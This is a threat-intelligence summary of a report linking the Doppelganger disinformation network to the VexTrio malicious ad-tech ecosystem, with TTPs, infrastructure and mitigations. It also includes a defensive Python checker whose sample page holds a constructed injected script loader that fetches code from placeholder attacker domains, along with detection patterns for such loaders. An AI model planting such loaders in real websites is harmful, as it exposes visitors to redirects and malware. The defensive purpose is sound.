Full Report
Late last year, security researchers made a startling discovery: Kremlin-backed disinformation campaigns were bypassing moderation on social media platforms by leveraging the same malicious advertising technology that powers a sprawling ecosystem of online hucksters and website hackers. A new report on the fallout from that investigation finds this dark ad tech industry is far more resilient and incestuous than previously known.
Analysis Summary
# Threat Actor: Doppelganger / VexTrio-Affiliated Actors
## Attribution & Identity
* **Primary Mentioned Operation:** Doppelganger (Disinformation Network)
* **Associated Ecosystem:** VexTrio (Thought to be the oldest malicious Traffic Distribution System (TDS) in existence).
* **Infrastructure/Monetization Operators:** Adspro Group (Registered in the Czech Republic and Russia).
* **Key Individuals/Entities:** Giulio Vittorio Leonardo Cerutti (Owner of Teknology SA and CEO of Holacode).
* **Associated Firms:** ByteCore AG, SkyForge Digital AG (Swiss firms whose content is copyrighted by LosPollos/TacoLoco).
* **Development Firm:** Holacode (Developed apps like LosPollos and TacoLoco).
## Activity Summary
* **Doppelganger:** A Kremlin-backed disinformation network identified in November 2024 promoting pro-Russian narratives and infiltrating Europe’s media landscape by pushing fake news through cloned websites.
* **VexTrio Ecosystem:** Operates a sprawling ecosystem of malicious advertising technology used by online hucksters and website hackers, managing web traffic from victims of phishing, malware, and social engineering scams.
* **Monetization Networks:** Utilizes the LosPollos[.]com and TacoLoco[.]co affiliate marketing services to drive traffic into the VexTrio TDS.
* **Traffic Redirection:** Nearly 40 percent of compromised websites in 2024 redirected visitors to VexTrio via LosPollos smartlinks, leading to scams, malware delivery, and push notification spam.
## Tactics, Techniques & Procedures
* **Domain Cloaking:** Doppelganger relies on a sophisticated domain cloaking service to present different content to search engines than to regular visitors, aiding persistence.
* **Traffic Redirection Chain:** Uses specialized links to bounce visitors through a long series of domains (starting with a Swiss ISP) before serving content.
* **Malicious Advertising/Smartlinks:** Uses JavaScript-heavy "smartlinks" distributed via affiliate networks (like LosPollos) that push traffic into the VexTrio TDS.
* **Website Compromise:** Affiliates stitch smartlinks into compromised **WordPress** websites by exploiting known vulnerabilities.
* **Deceptive Push Notifications:** TacoLoco deceives users into enabling push notifications by disguising the approval request as a "CAPTCHA" challenge.
* **Monetization Lures:** Traffic is distributed toward dating services, sweepstakes offers, bait-and-switch mobile apps, financial scams, and malware download sites.
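As an added example (not from the report or from any project it names), here is a small defender-side check for the injected smartlink loaders described under Website Compromise: it lists the script sources in a WordPress page that are not on the site's own allowlist and flags obfuscated inline loaders. The allowlist, the page fragment and the `.invalid` attacker domain are constructed placeholders.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts this site legitimately loads scripts from (constructed allowlist for the example).
ALLOWED_HOSTS = {"example-blog.test", "www.example-blog.test", "cdnjs.cloudflare.com"}

# Heuristics for loader snippets typical of injected code: decoding packed strings
# and inserting a script element at runtime.
SUSPICIOUS_INLINE = re.compile(
    r"atob\(|eval\(|fromCharCode|document\.createElement\(['\"]script", re.I)

class ScriptCollector(HTMLParser):
    """Collect external <script src> values and inline <script> bodies."""
    def __init__(self):
        super().__init__()
        self.external, self.inline, self._in_script = [], [], False
    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.external.append(src)
            else:
                self._in_script = True
                self.inline.append("")
    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False
    def handle_data(self, data):
        if self._in_script:
            self.inline[-1] += data

def script_host(src):
    """Hostname of an absolute or protocol-relative src; None for same-origin paths."""
    if src.startswith("//"):
        src = "https:" + src
    p = urlparse(src)
    return p.hostname.lower() if p.scheme in ("http", "https") and p.hostname else None

def find_injected_scripts(html, allowed_hosts=ALLOWED_HOSTS):
    """Return (reason, evidence) findings for scripts that do not belong on the page."""
    c = ScriptCollector()
    c.feed(html)
    findings = [("unexpected external script host", h)
                for h in map(script_host, c.external) if h and h not in allowed_hosts]
    findings += [("obfuscated inline loader", b.strip()[:60])
                 for b in c.inline if SUSPICIOUS_INLINE.search(b)]
    return findings

# Constructed page fragment: two legitimate includes, one injected loader from a
# placeholder attacker domain, and one inline snippet that decodes a base64 URL.
SAMPLE_PAGE = """<html><head>
<script src="/wp-includes/js/jquery/jquery.min.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/lodash.js/4.17.21/lodash.min.js"></script>
<script src="//redirector.example-attacker.invalid/sl.js" async></script>
<script>var s=document.createElement('script');s.src=atob('Ly94LmludmFsaWQvYS5qcw==');
document.head.appendChild(s);</script></head><body>post body</body></html>"""

if __name__ == "__main__":
    for reason, evidence in find_injected_scripts(SAMPLE_PAGE):
        print(f"{reason}: {evidence}")
```

Run against exported post content or rendered theme pages; the allowlist should hold only the site's own hostnames and the CDNs it knowingly uses.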
## Targeting
* **Sectors:** Media (via disinformation campaigns), general consumers/users visiting compromised websites (via scams and malware).
* **Geography:** Europe (specific focus for Doppelganger misinformation), Global (due to compromised websites and VexTrio reach).
* **Victims:** Internet users targeted by scams, consumers who lose money to information-stealer malware, and entities hosting compromised WordPress sites.
## Tools & Infrastructure
* **Malware Families Used:** Information stealers and various malware are delivered via the VexTrio pathway.
* **Traffic Distribution Systems (TDS):** VexTrio.
* **Malicious Ad Networks:** LosPollos[.]com, TacoLoco[.]co.
* **Infrastructure Hosting:** Hosting provider C41 (Switzerland), Teknology SA (Switzerland).
* **Delivery Mechanism:** WordPress exploitation, "smartlinks."
* **Service Misdirection:** Development of anti-scam/VPN apps (e.g., Spamshield) by Holacode potentially masks illicit activities.
## Implications
This represents a convergence between state-backed influence operations (Doppelganger) and large-scale, profit-driven criminal infrastructure (VexTrio, LosPollos). The resilience and incestuous nature of the dark ad tech ecosystem, controlled primarily by Russian organized crime elements, poses a massive, pervasive threat capable of delivering high volumes of scams and malware globally.
## Mitigations
* **Restrict Push Notifications:** Be extremely sparing when approving site notifications; configure browsers to block new notification requests entirely (the original report gives specific steps for Firefox, Chrome, and Safari).
* **Endpoint Security:** Maintain strong defenses against information stealers and malware delivered through potentially compromised websites.
* **Patch Management:** Ensure WordPress installations and plugins are patched promptly to close the known vulnerabilities used to inject smartlinks.